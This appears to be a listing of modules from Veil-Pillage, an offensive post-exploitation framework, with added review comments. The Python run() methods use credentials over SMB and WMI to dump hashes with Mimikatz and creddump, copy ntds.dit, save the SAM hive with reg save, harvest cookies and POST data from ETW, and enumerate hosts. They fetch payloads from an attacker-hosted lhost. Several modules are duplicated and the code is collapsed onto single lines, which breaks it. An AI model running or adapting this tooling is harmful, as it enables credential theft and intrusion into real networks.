# Collects the netview.exe output file (default directory C:\Windows\Temp) from
# each target over SMB with self.creds[0], deletes both the result file
# (delete=True) and C:\Windows\Temp\netview.exe, and stores the result via
# helpers.saveModuleFile as netview.txt.
# NOTE(review): the plaintext password is concatenated into self.output on both
# branches, so it ends up in any saved module log.
# NOTE(review): this listing collapsed the method onto one line; the inline '#'
# comments swallow the rest of the statement as written — re-indent before use.
def run(self): # assume single set of credentials username, password = self.creds[0] out_file = self.required_options["out_file"][0] if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file for target in self.targets: # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # delete the netview.exe binary smb.deleteFile(target, username, password, "C:\\Windows\\Temp\\netview.exe") # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "netview.txt", out) if out != "": self.output += "[*] netview.exe results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n" else: self.output += "[!] netview.exe execution failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
# Uploads data/misc/finddllhijack.exe to C$\Windows\Temp\ on each target, runs
# it via command_methods.executeResult (pause=5), removes the binary with a
# 'del' command, and stores the output as finddllhijack.txt. Only
# self.creds[0] is used.
# NOTE(review): smb.uploadFile's result is not checked, so a failed upload still
# proceeds to the execute and cleanup steps and reports "no result file".
# NOTE(review): this listing collapsed the method onto one line; the inline '#'
# comments swallow the rest of the statement as written — re-indent before use.
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] # command to invoke finddllhijack and output it to a temporary file exePath = settings.VEIL_PILLAGE_PATH+"/data/misc/finddllhijack.exe" cmd = "C:\\Windows\\Temp\\finddllhijack.exe" for target in self.targets: # upload the binary to the host at C:\Windows\Temp\ smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath) # execute finddllhijack and get the results out = command_methods.executeResult(target, username, password, cmd, triggerMethod, pause=5) # cleanup command_methods.executeCommand(target, username, password, "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out) if out != "": self.output += "[*] FindDllHijack results for "+target+" stored at "+saveFile+"\n" else: self.output += "[!] FindDllHijack failed for "+target+" : no result file\n"
# Runs a fixed chain of host-enumeration commands (ipconfig, arp, net users,
# net sessions, qwinsta, netstat, tasklist, systeminfo) on each target, each
# appended to outFile, sleeps a fixed 20 s, then pulls and deletes the file
# over SMB and stores it as enum_host.txt. Only self.creds[0] is used.
# NOTE(review): `result` and `targetUsernames` are assigned but never used, and
# the plaintext password is concatenated into self.output on both branches.
# NOTE(review): this listing collapsed the method onto one line; the inline '#'
# comments swallow the rest of the statement as written — re-indent before use.
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] outFile = self.required_options["out_file"][0] if "\\" not in outFile: # otherwise assume it's an absolute path outFile = "C:\\Windows\\Temp\\" + outFile for target in self.targets: targetUsernames = [] command = "echo IPCONFIG:>>%(p)s&ipconfig /all>>%(p)s&echo ARP:>>%(p)s&arp -a>>%(p)s&echo NET USERS:>>%(p)s&net users>>%(p)s&echo NET SESSIONS:>>%(p)s&net sessions>>%(p)s&echo QWINSTA:>>%(p)s&qwinsta>>%(p)s&echo NETSTAT:>>%(p)s&netstat -nao>>%(p)s&echo TASKLIST:>>%(p)s&tasklist /v>>%(p)s&echo SYSTEMINFO:>>%(p)s&systeminfo>>%(p)s" %{"p":outFile} # execute the command result = command_methods.executeCommand(target, username, password, command, triggerMethod) # wait 20 seconds for "systeminfo" to run print helpers.color("\n [*] Waiting 20 seconds for enumeration commands to run on '"+target+"'", status=True) time.sleep(20) # # grab the output file and delete it out = smb.getFile(target, username, password, outFile, delete=True) if out != "": # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "enum_host.txt", out) self.output += "[*] enum_host results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n" else: self.output += "[!] enum_host failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
# Collects the netview.exe output file (default directory C:\Windows\Temp) from
# each target over SMB with self.creds[0], deletes both the result file
# (delete=True) and C:\Windows\Temp\netview.exe, and stores the result via
# helpers.saveModuleFile as netview.txt.
# NOTE(review): the plaintext password is concatenated into self.output on both
# branches, so it ends up in any saved module log.
# NOTE(review): this listing collapsed the method onto one line; the inline '#'
# comments swallow the rest of the statement as written — re-indent before use.
def run(self): # assume single set of credentials username, password = self.creds[0] out_file = self.required_options["out_file"][0] if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file for target in self.targets: # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # delete the netview.exe binary smb.deleteFile(target, username, password, "C:\\Windows\\Temp\\netview.exe") # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "netview.txt", out) if out != "": self.output += "[*] netview.exe results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: self.output += "[!] netview.exe execution failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
# Downloads fileName from each target over SMB with self.creds[0]; the remote
# copy is deleted only when the "delete" option equals "true"
# (case-insensitive). An empty result is reported as "empty or doesn't exist";
# otherwise the file is stored under its basename (text after the last '\').
# NOTE(review): the two branches differ only in the delete flag; passing
# `delete=(deleteFile.lower() == "true")` once would remove the duplication.
# The plaintext password is concatenated into self.output on both branches.
# NOTE(review): this listing collapsed the method onto one line; the inline '#'
# comments swallow the rest of the statement as written — re-indent before use.
def run(self): # assume single set of credentials for this module username, password = self.creds[0] fileName = self.required_options["fileName"][0] deleteFile = self.required_options["delete"][0] for target in self.targets: print "\n [*] downloading '"+fileName+"' from "+target # check if the user wants to delete the file after download if deleteFile.lower() == "true": out = smb.getFile(target, username, password, fileName, delete=True) else: out = smb.getFile(target, username, password, fileName, delete=False) if out == "": self.output += "[!] File '"+fileName+"' from "+target+" using creds '"+username+":"+password+"' empty or doesn't exist\n" # TODO: keep this "" or change to None if nothing is returned? else: # write the module out to the appropriate output location saveName = helpers.saveModuleFile(self, target, fileName.split("\\")[-1], out) self.output += "[*] File '"+fileName+"' from "+target+" using creds '"+username+":"+password+"' saved to "+saveName+"\n"
# Reads %USERPROFILE% from each target, lists four Recent / Office Recent
# directories under it over SMB (path_error=False), downloads every entry
# ending in "lnk" and parses it with pylnker.parse_lnk, storing the raw file
# and a '<name>_details' parse result via helpers.saveModuleFile.
# NOTE(review): the bare `except:` hides every parse failure (including
# KeyboardInterrupt) behind one generic message — narrow it to `Exception`
# and record the error text. `file` shadows the builtin, and the suffix test
# `file[-3:] == "lnk"` is case-sensitive, so ".LNK" entries are skipped.
# NOTE(review): this listing collapsed the method onto one line; the inline '#'
# comments swallow the rest of the statement as written — re-indent before use.
def run(self): # assume single set of credentials for this module username, password = self.creds[0] trigger_method = self.required_options["trigger_method"][0] for target in self.targets: command = "echo %USERPROFILE%" user_profile = command_methods.executeResult(target, username, password, command, trigger_method) if user_profile == '': self.output += " [!] No result file querying env variables using creds " + username + ":" + password + " on: " + target + "\n" else: user_profile = user_profile.strip(" \r\n") recent_path1 = user_profile + "\\Recent" recent_path2 = user_profile + "\\AppData\\Roaming\\Microsoft\\Windows\\Recent" office_path1 = user_profile + "\\Application Data\\Microsoft\\Office\\Recent" office_path2 = user_profile + "\\AppData\\Roaming\\Microsoft\\Office\\Recent" self.output += " [*] Enumerating recent files on %s \n" % target for path in [recent_path1, recent_path2, office_path1, office_path2]: files = smb.ls(target, username, password, path, path_error=False) if len(files) > 0: self.output += " [*] Found %s files \n" % len(files) for file in files: if file[-3:] == "lnk": out = smb.getFile(target, username, password, path + "\\" + file, delete=False) if out == '': self.output += " [!] Failed retrieving : %s \n" % file else: save_path = helpers.saveModuleFile(self, target, file, out) self.output += " [*] .lnk file %s saved from %s to %s\n" % (file,path,save_path) try: # parsed_lnk = str(pylnk.parse(save_path)).decode('cp1252') parsed_lnk = pylnker.parse_lnk(save_path) details_path = helpers.saveModuleFile(self, target, file + '_details', parsed_lnk) self.output += " [*] .lnk file %s parsed and saved to %s\n" % (save_path,details_path) except: self.output += " [!] Error while parsing : %s \n" % save_path
# Hosts PowerSploit Invoke-Mimikatz.ps1 from lhost and fires the PowerShell
# download cradle on every target at once via delivery_methods.powershellHostTrigger
# (noArch=True, output redirected to out_file), waits `delay` seconds, then
# retrieves and deletes out_file from each target and stores it as mimikatz.txt.
# Only self.creds[0] is used.
# NOTE(review): int(delay) is evaluated after the trigger has already fired, so a
# non-numeric "delay" option raises ValueError mid-operation; validate it first.
# The plaintext password is concatenated into self.output on both branches.
# NOTE(review): this listing collapsed the method onto one line; the inline '#'
# comments swallow the rest of the statement as written — re-indent before use.
def run(self): # assume single set of credentials username, password = self.creds[0] use_ssl = self.required_options["use_ssl"][0] lhost = self.required_options["lhost"][0] triggerMethod = self.required_options["trigger_method"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # the temporary output file Invoke-Mimikatz will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # path to the PowerSploit Invoke-Mimikatz.ps1 powershell script secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/PowerSploit/Invoke-Mimikatz.ps1" # Mimikatz command to run scriptArguments = "Invoke-Mimikatz -Dumpcreds" # trigger the powershell download on all targets # ignore the architecture-independent cradle delivery_methods.powershellHostTrigger(self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod=triggerMethod, outFile=out_file, ssl=use_ssl, noArch=True) print "\n [*] Waiting " + delay + "s for Mimikatz to run..." time.sleep(int(delay)) for target in self.targets: # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) if out != "": # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) self.output += "[*] Powersploit:Invoke-Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: self.output += "[!] Powersploit:Invoke-Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
# Stops the 'Status32' ETW trace session with logman on each target, queries
# C:\Windows\Temp\status32.etl through wevtutil piped to `find /i` for either
# "POST" or "cookie added" (chosen by the "flag" option, pause=20), deletes the
# .etl with a 'del' command, and stores the matches as post_params.txt or
# cookies.txt. Only self.creds[0] is used.
# NOTE(review): `flag` is rewritten inside the loop; "post".lower() still
# matches on the next target so results stay consistent, but resolving flag and
# moduleFile once before the loop would be clearer. The plaintext password is
# concatenated into self.output on both branches.
# NOTE(review): this listing collapsed the method onto one line; the inline '#'
# comments swallow the rest of the statement as written — re-indent before use.
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] flag = self.required_options["flag"][0] for target in self.targets: # stop the ETW stopCMD = "logman stop Status32 -ets" command_methods.executeCommand(target, username, password, stopCMD, triggerMethod) # search for cookies or POST paramters if flag.lower() == "post": flag = "POST" moduleFile = "post_params.txt" else: flag = "cookie added" moduleFile = "cookies.txt" # check the ETW results for the specified flag, and delete the dump file parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \"" + flag + "\"" # wait 20 seconds for everything to parse...if errors happen, increase this parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20) # delete the trace file delCmd = "del C:\\Windows\\Temp\\status32.etl" command_methods.executeCommand(target, username, password, delCmd, triggerMethod) if parseResult == "": self.output += "[!] No ETW results for " + flag + " using creds '" + username + ":" + password + "' on : " + target + "\n" else: # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult) self.output += "[*] ETW results for " + flag + " using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
# Hosts PowerSploit Invoke-NinjaCopy.ps1 from lhost and triggers it on all
# targets to copy host_file into C:\Windows\Temp\<basename>; after a fixed 30 s
# sleep the copy is retrieved over SMB (delete=False) and stored under its
# basename via helpers.saveModuleFile. Only self.creds[0] is used.
# NOTE(review): the shorthand check compares against "ntdis.dit", which looks
# like a typo for "ntds.dit" — as written the shorthand never expands and the
# literal name is used as a relative path. Unlike the Mimikatz modules in this
# listing, the copied file remains on the target (delete=False).
# The plaintext password is concatenated into self.output on every branch.
# NOTE(review): this listing collapsed the method onto one line; the inline '#'
# comments swallow the rest of the statement as written — re-indent before use.
def run(self): # assume single set of credentials username, password = self.creds[0] use_ssl = self.required_options["use_ssl"][0] lhost = self.required_options["lhost"][0] triggerMethod = self.required_options["trigger_method"][0] host_file = self.required_options["host_file"][0] # the protected file on the host to copy if host_file == "ntdis.dit": host_file = "C:\\Windows\\ntds\\ntds.dit" # Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "c:\windows\temp\ntds.dit" # local file to copy into localFile = "C:\\Windows\\Temp\\"+host_file.split("\\")[-1] # path to the PowerSploit Invoke-NinjaCopy.ps1 powershell script secondStagePath = settings.VEIL_PILLAGE_PATH+"/data/PowerSploit/Invoke-NinjaCopy.ps1" # pass the arguments to invoke ninja-copy scriptArguments = "Invoke-NinjaCopy -Path \""+host_file+"\" -LocalDestination "+localFile # trigger the powershell download on all targets delivery_methods.powershellHostTrigger(self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod=triggerMethod, ssl=use_ssl) for target in self.targets: self.output += "[*] Powersploit:Invoke-NinjaCopy triggered using creds '"+username+":"+password+"' on "+target+"\n" print "\n [*] Waiting 30s for NinjaCopy to run..." time.sleep(30) for target in self.targets: # grab the output file and delete it out = smb.getFile(target, username, password, localFile, delete=False) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, host_file.split("\\")[-1], out) if out != "": self.output += "[*] Powersploit:Invoke-NinjaCopy results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n" else: self.output += "[!] Powersploit:Invoke-NinjaCopy failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
# Runs `net view/users/groups/accounts /domain` on each target with output
# appended to outFile, using winexe unconditionally (the inline comment notes
# wmis rejects these commands), sleeps a fixed 20 s, then pulls and deletes the
# file over SMB and stores it as enum_domain.txt. Only self.creds[0] is used.
# NOTE(review): `result` and `targetUsernames` are assigned but never used, and
# the plaintext password is concatenated into self.output on both branches.
# NOTE(review): this listing collapsed the method onto one line; the inline '#'
# comments swallow the rest of the statement as written — re-indent before use.
def run(self): # assume single set of credentials username, password = self.creds[0] outFile = self.required_options["out_file"][0] # wmis doesn't like net * /domain commands >_< triggerMethod = "winexe" if "\\" not in outFile: # otherwise assume it's an absolute path outFile = "C:\\Windows\\Temp\\" + outFile for target in self.targets: targetUsernames = [] command = "echo NET VIEW:>>%(p)s&net view /domain>>%(p)s&echo NET USERS:>>%(p)s&net users /domain>>%(p)s&echo NET GROUPS:>>%(p)s&net groups /domain>>%(p)s&echo NET ACCOUNTS:>>%(p)s&net accounts /domain>>%(p)s" % { "p": outFile } # execute the command result = command_methods.executeCommand(target, username, password, command, triggerMethod) # wait 20 seconds for commands to run print helpers.color( "\n [*] Waiting 20 seconds for enumeration commands to run on '" + target + "'", status=True) time.sleep(20) # # grab the output file and delete it out = smb.getFile(target, username, password, outFile, delete=True) if out != "": # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "enum_domain.txt", out) self.output += "[*] enum_domain results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" else: self.output += "[!] enum_domain failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
# Hosts PowerSploit Invoke-Mimikatz.ps1 from lhost and fires the PowerShell
# download cradle on every target at once via delivery_methods.powershellHostTrigger
# (noArch=True, output redirected to out_file), waits `delay` seconds, then
# retrieves and deletes out_file from each target and stores it as mimikatz.txt.
# Only self.creds[0] is used.
# NOTE(review): int(delay) is evaluated after the trigger has already fired, so a
# non-numeric "delay" option raises ValueError mid-operation; validate it first.
# The plaintext password is concatenated into self.output on both branches.
# NOTE(review): this listing collapsed the method onto one line; the inline '#'
# comments swallow the rest of the statement as written — re-indent before use.
def run(self): # assume single set of credentials username, password = self.creds[0] use_ssl = self.required_options["use_ssl"][0] lhost = self.required_options["lhost"][0] triggerMethod = self.required_options["trigger_method"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # the temporary output file Invoke-Mimikatz will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # path to the PowerSploit Invoke-Mimikatz.ps1 powershell script secondStagePath = settings.VEIL_PILLAGE_PATH+"/data/PowerSploit/Invoke-Mimikatz.ps1" # Mimikatz command to run scriptArguments = "Invoke-Mimikatz -Dumpcreds" # trigger the powershell download on all targets # ignore the architecture-independent cradle delivery_methods.powershellHostTrigger(self.targets, username, password, secondStagePath, lhost, scriptArguments, triggerMethod=triggerMethod, outFile=out_file, ssl=use_ssl, noArch=True) print "\n [*] Waiting "+delay+"s for Mimikatz to run..." time.sleep(int(delay)) for target in self.targets: # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) if out != "": # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out) self.output += "[*] Powersploit:Invoke-Mimikatz results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n" else: self.output += "[!] Powersploit:Invoke-Mimikatz failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
# Uploads data/misc/finddllhijack.exe to C$\Windows\Temp\ on each target, runs
# it via command_methods.executeResult (pause=5), removes the binary with a
# 'del' command, and stores the output as finddllhijack.txt. Only
# self.creds[0] is used.
# NOTE(review): smb.uploadFile's result is not checked, so a failed upload still
# proceeds to the execute and cleanup steps and reports "no result file".
# NOTE(review): this listing collapsed the method onto one line; the inline '#'
# comments swallow the rest of the statement as written — re-indent before use.
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] # command to invoke finddllhijack and output it to a temporary file exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe" cmd = "C:\\Windows\\Temp\\finddllhijack.exe" for target in self.targets: # upload the binary to the host at C:\Windows\Temp\ smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath) # execute finddllhijack and get the results out = command_methods.executeResult(target, username, password, cmd, triggerMethod, pause=5) # cleanup command_methods.executeCommand( target, username, password, "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out) if out != "": self.output += "[*] FindDllHijack results for " + target + " stored at " + saveFile + "\n" else: self.output += "[!] FindDllHijack failed for " + target + " : no result file\n"
# Stops the 'Status32' ETW trace session with logman on each target, queries
# C:\Windows\Temp\status32.etl through wevtutil piped to `find /i` for either
# "POST" or "cookie added" (chosen by the "flag" option, pause=20), deletes the
# .etl with a 'del' command, and stores the matches as post_params.txt or
# cookies.txt. Only self.creds[0] is used.
# NOTE(review): `flag` is rewritten inside the loop; "post".lower() still
# matches on the next target so results stay consistent, but resolving flag and
# moduleFile once before the loop would be clearer. The plaintext password is
# concatenated into self.output on both branches.
# NOTE(review): this listing collapsed the method onto one line; the inline '#'
# comments swallow the rest of the statement as written — re-indent before use.
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] flag = self.required_options["flag"][0] for target in self.targets: # stop the ETW stopCMD = "logman stop Status32 -ets" command_methods.executeCommand(target, username, password, stopCMD, triggerMethod) # search for cookies or POST paramters if flag.lower() == "post": flag = "POST" moduleFile = "post_params.txt" else: flag = "cookie added" moduleFile = "cookies.txt" # check the ETW results for the specified flag, and delete the dump file parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \""+flag+"\"" # wait 20 seconds for everything to parse...if errors happen, increase this parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20) # delete the trace file delCmd = "del C:\\Windows\\Temp\\status32.etl" command_methods.executeCommand(target, username, password, delCmd, triggerMethod) if parseResult == "": self.output += "[!] No ETW results for "+flag+" using creds '"+username+":"+password+"' on : " + target + "\n" else: # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult) self.output += "[*] ETW results for "+flag+" using creds '"+username+":"+password+"' on " + target + " stored at "+saveFile+"\n"
# Downloads fileName from each target over SMB with self.creds[0]; the remote
# copy is deleted only when the "delete" option equals "true"
# (case-insensitive). An empty result is reported as "empty or doesn't exist";
# otherwise the file is stored under its basename (text after the last '\').
# NOTE(review): the two branches differ only in the delete flag; passing
# `delete=(deleteFile.lower() == "true")` once would remove the duplication.
# The plaintext password is concatenated into self.output on both branches.
# NOTE(review): this listing collapsed the method onto one line; the inline '#'
# comments swallow the rest of the statement as written — re-indent before use.
def run(self): # assume single set of credentials for this module username, password = self.creds[0] fileName = self.required_options["fileName"][0] deleteFile = self.required_options["delete"][0] for target in self.targets: print "\n [*] downloading '" + fileName + "' from " + target # check if the user wants to delete the file after download if deleteFile.lower() == "true": out = smb.getFile(target, username, password, fileName, delete=True) else: out = smb.getFile(target, username, password, fileName, delete=False) if out == "": self.output += "[!] File '" + fileName + "' from " + target + " using creds '" + username + ":" + password + "' empty or doesn't exist\n" # TODO: keep this "" or change to None if nothing is returned? else: # write the module out to the appropriate output location saveName = helpers.saveModuleFile(self, target, fileName.split("\\")[-1], out) self.output += "[*] File '" + fileName + "' from " + target + " using creds '" + username + ":" + password + "' saved to " + saveName + "\n"
# Runs `net view/users/groups/accounts /domain` on each target with output
# appended to outFile, using winexe unconditionally (the inline comment notes
# wmis rejects these commands), sleeps a fixed 20 s, then pulls and deletes the
# file over SMB and stores it as enum_domain.txt. Only self.creds[0] is used.
# NOTE(review): `result` and `targetUsernames` are assigned but never used, and
# the plaintext password is concatenated into self.output on both branches.
# NOTE(review): this listing collapsed the method onto one line; the inline '#'
# comments swallow the rest of the statement as written — re-indent before use.
def run(self): # assume single set of credentials username, password = self.creds[0] outFile = self.required_options["out_file"][0] # wmis doesn't like net * /domain commands >_< triggerMethod = "winexe" if "\\" not in outFile: # otherwise assume it's an absolute path outFile = "C:\\Windows\\Temp\\" + outFile for target in self.targets: targetUsernames = [] command = "echo NET VIEW:>>%(p)s&net view /domain>>%(p)s&echo NET USERS:>>%(p)s&net users /domain>>%(p)s&echo NET GROUPS:>>%(p)s&net groups /domain>>%(p)s&echo NET ACCOUNTS:>>%(p)s&net accounts /domain>>%(p)s"%{"p":outFile} # execute the command result = command_methods.executeCommand(target, username, password, command, triggerMethod) # wait 20 seconds for commands to run print helpers.color("\n [*] Waiting 20 seconds for enumeration commands to run on '"+target+"'", status=True) time.sleep(20) # # grab the output file and delete it out = smb.getFile(target, username, password, outFile, delete=True) if out != "": # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "enum_domain.txt", out) self.output += "[*] enum_domain results using creds '"+username+":"+password+"' on "+target+" stored at "+saveFile+"\n" else: self.output += "[!] enum_domain failed using creds '"+username+":"+password+"' on "+target+" : no result file\n"
# Credential "autograb". Per target it picks a PowerShell or a binary path
# (force_method, else a 'powershell.exe -c "$a=42;$a"' probe over wmis).
# PowerShell path: hosts data/misc/autograb.ps1 via powershellHostTrigger and
# parses the result with helpers.parseMimikatz and helpers.parseHashdump.
# Binary path: `reg save` of the SYSTEM/SECURITY/SAM hives to C:\Windows\Temp,
# fetched over SMB and written to the local files /tmp/system, /tmp/security
# and /tmp/sam, hashes extracted with creddump.dump_file_hashes(system, sam),
# then an arch-matched mimikatz<arch>.exe is hosted and run with its output
# redirected to out_file. De-duplicated totals are appended to self.output.
# NOTE(review): in the binary path creddump.dump_file_hashes runs even when the
# SYSTEM or SAM download came back empty, so a stale /tmp/system or /tmp/sam
# from a previous target is parsed silently (the hashdump module in this
# listing guards that with an `error` flag). The fixed /tmp paths are shared
# across targets and runs; tempfile.mkdtemp() would avoid that.
# NOTE(review): the hive copies are opened with mode "w"; that is only
# binary-safe on a POSIX host (the print statements suggest Python 2) — "wb"
# is the portable choice. int(delay) is evaluated only after each trigger has
# fired, so a non-numeric "delay" option aborts mid-operation.
# NOTE(review): the saved hives remain on the target under C:\Windows\Temp
# (delete=False) and the plaintext password is concatenated into self.output.
# NOTE(review): this listing splits the method across four physical lines,
# including inside string literals, and inline '#' comments swallow the rest
# of each line — it must be re-indented before use.
def run(self): # assume single set of credentials for this module username, password = self.creds[0] lhost = self.required_options["lhost"][0] use_ssl = self.required_options["use_ssl"][0] force_method = self.required_options["force_method"][0] delay = self.required_options["delay"][0] out_file = self.required_options["out_file"][0] # let's keep track of all credentials found allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], [] for target in self.targets: powershellInstalled = False # check if we're forcing a particular grab method if force_method.lower() == "binary": powershellInstalled = False elif force_method.lower() == "powershell": powershellInstalled = True else: # check if we have a functional Powershell installation powershellCommand = 'powershell.exe -c "$a=42;$a"' powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis") if powershellResult.strip() == "42": powershellInstalled = True if powershellInstalled: # do powersploit combined file of invoke-mimikatz and powerdump print helpers.color("\n [*] Powershell installed on " + target) self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n" # the temporary output file we will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file # path to the combined Invoke-Mimikatz/powerdump powershell script secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1" # trigger the powershell download on just this target delivery_methods.powershellHostTrigger( target, username, password, secondStagePath, lhost, "", triggerMethod="winexe", outFile=out_file, ssl=use_ssl, noArch=True, ) print "\n [*] Waiting " + delay + "s for Autograb to run..." 
time.sleep(int(delay)) # grab the output file and delete it out = smb.getFile(target, username, password, out_file, delete=True) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out) # parse the mimikatz output and append it to our globals (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out) allmsv.extend(msv1_0) allkerberos.extend(kerberos) allwdigest.extend(wdigest) alltspkg.extend(tspkg) # parse the powerdump component hashes = helpers.parseHashdump(out) allhashes.extend(hashes) if out != "": self.output += ( "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n" ) else: self.output += ( "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n" ) else: # do reg.exe for hashdump and host/execute for mimikatz print helpers.color("\n [!] Powershell not installed on " + target, warning=True) print helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target) self.output += "[!] Powershell not installed on " + target + "\n" # reg.exe command to save off the hives regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y" # execute the registry save command command_methods.executeCommand(target, username, password, regSaveCommand, "wmis") print helpers.color("\n [*] Dumping hashes on " + target) # sleep for 5 seconds to let everything backup time.sleep(5) # grab all of the backed up files systemFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\system", delete=False) securityFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\security", delete=False) samFile = smb.getFile(target, username, password, "C:\\Windows\\Temp\\sam", delete=False) # more error-checking here? if systemFile == "": self.output += "[!] 
File '" + systemFile + "' from " + target + " empty or doesn't exist\n" else: f = open("/tmp/system", "w") f.write(systemFile) f.close() if securityFile == "": self.output += "[!] File '" + securityFile + "' from " + target + " empty or doesn't exist\n" else: f = open("/tmp/security", "w") f.write(securityFile) f.close() if samFile == "": self.output += "[!] File '" + samFile + "' from " + target + " empty or doesn't exist\n" else: f = open("/tmp/sam", "w") f.write(samFile) f.close() # get all the hashes from these hives out = creddump.dump_file_hashes("/tmp/system", "/tmp/sam") # save the output file off saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out) self.output += ( "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n" ) # save these off to the universal list hashes = helpers.parseHashdump(out) allhashes.extend(hashes) # now, detect the architecture archCommand = "echo %PROCESSOR_ARCHITECTURE%" archResult = command_methods.executeResult(target, username, password, archCommand, "wmis") arch = "x86" if "64" in archResult: arch = "x64" # now time for ze mimikatz! mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe" # the temporary output file we will write to if "\\" not in out_file: # otherwise assume it's an absolute path out_file = "C:\\Windows\\Temp\\" + out_file exeArgs = '"sekurlsa::logonPasswords full" "exit" >' + out_file # host mimikatz.exe and trigger it ONLY on this particular machine # so we can get the architecture correct delivery_methods.hostTrigger( target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs ) print "\n [*] Waiting " + delay + "s for Mimikatz to run..." 
